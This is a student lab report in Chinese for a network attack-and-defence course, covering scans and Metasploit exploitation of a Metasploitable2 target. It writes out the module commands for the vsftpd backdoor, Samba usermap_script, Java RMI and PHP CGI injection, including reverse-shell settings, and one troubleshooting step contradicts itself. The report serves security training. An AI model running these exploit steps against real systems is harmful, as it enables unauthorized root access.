首页/资讯中心/详情

20232418 2025-2026-1 《网络与系统攻防技术》实验六实验报告

20232418 2025-2026-1 《网络与系统攻防技术》实验六实验报告
📅 发布时间:2026/6/20 19:08:52

20232418 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1发现Metasploitable2靶机,掌握metasploit、nmap的用法。

1.2利用Vsftpd源码包后门漏洞。

1.3利用SambaMS-RPC Shell命令注入漏洞。

1.4利用Java RMI SERVER命令执行漏洞

1.5利用PHP CGI参数执行注入漏洞.

2.实验要求

2.1掌握metasploit、nmap的用法。

2.2学习前期渗透的方法。

2.3利用4个漏洞,实现对靶机的攻击。

3.实验过程

3.1 前期渗透

3.1.1 在靶机中使用ipconfig得到ip地址为192.168.31.135.

image

在kali中打开msfconsole,输入以下命令。
search arp_sweep
use 0
set RHOSTS 192.168.31.0/24
run
image

在命令行中输入nmap -p 1-2048 192.168.31.135查看靶机开放的端口
image

在命令行中输入nmap -script=vuln 192.168.31.135对靶机的漏洞进行扫描
image
image
image
端口情况:共扫描了 1000 个 TCP 端口,其中显示开放的端口有 21/tcp(ftp)、22/tcp(ssh)、23/tcp(telnet)等,977 个端口处于关闭(reset)状态。
发现21端口有vsFTPd漏洞,vsFTPd 2.3.4 版本存在后门,通过该后门可执行系统命令,扫描结果中执行id命令显示获取到了uid=0(root) gid=0(root)权限(即 root 权限)。
80端口存在Slowloris 拒绝服务漏洞,Slowloris 是一种针对 Web 服务器的 DOS 攻击技术,利用 HTTP 协议的特性消耗服务器连接资源。HTTP TRACE 方法的启用则增加了客户端信息泄露的风险,这些漏洞结合起来会严重影响 Web 服务的可用性与安全性。
1099端口有RMI registry default configuration remote code execution漏洞,rmiregistry是其注册表服务端口。该漏洞因配置不当,允许攻击者通过加载恶意类文件执行任意代码,对服务器权限控制和数据安全威胁极大。

3.2 Vsftpd源码包后门漏洞(21端口)

在msfconsole中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.31.135
run
再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功
image

3.3 SambaMS-RPC Shell命令注入漏洞(端口139)

在msfconsole中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.31.135
exploit
再输入uname -a命令,可以看到已经获取靶机的shell,攻击成功
image

3.4Java RMI SERVER命令执行漏洞(1099端口)

在前期渗透中已经得知1099端口开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.31.135
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
image

3.5PHP CGI参数执行注入漏洞(80端口)

在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.31.135
exploit
shell
可以执行命令,说明攻击成功。
image

4.问题及解决方案

问题一:初始使用arp_sweep扫描时,因误输入网段192.168.31.0/24,未检测到目标靶机192.168.31.135。
解决方案:核对靶机ifconfig输出的正确 IP 网段,重新设置RHOSTS 192.168.31.0/24,成功扫描到靶机在线状态。
问题二:首次使用exploit/multi/samba/usermap_script时,未设置LHOST为攻击机IP,导致漏洞利用完成但未建立shell会话。
解决方案:通过set LHOST 192.168.31.197指定攻击机本地IP,重新执行exploit,成功建立反向TCP连接并获取shell。

5.学习感悟、思考等

本次实验让我完整掌握“信息收集-漏洞利用-权限获取”渗透流程,熟练运用metasploit与nmap工具。从定位靶机IP、扫描端口漏洞,到利用Vsftpd、Samba等4类漏洞获取权限,每步都需精准配置参数,如Samba攻击中修正LHOST才成功建会话,让我深知渗透测试的严谨性。 实验也暴露靶机“未更新系统、默认配置不安全”的典型隐患,如2011年的Vsftpd漏洞仍可利用,印证“系统防护需及时打补丁、关无用端口”的重要性。后续我会深入学习免杀技术,同时从防御视角思考漏洞防护策略,建立“攻防兼备”思维,持续提升网络安全实操与认知能力。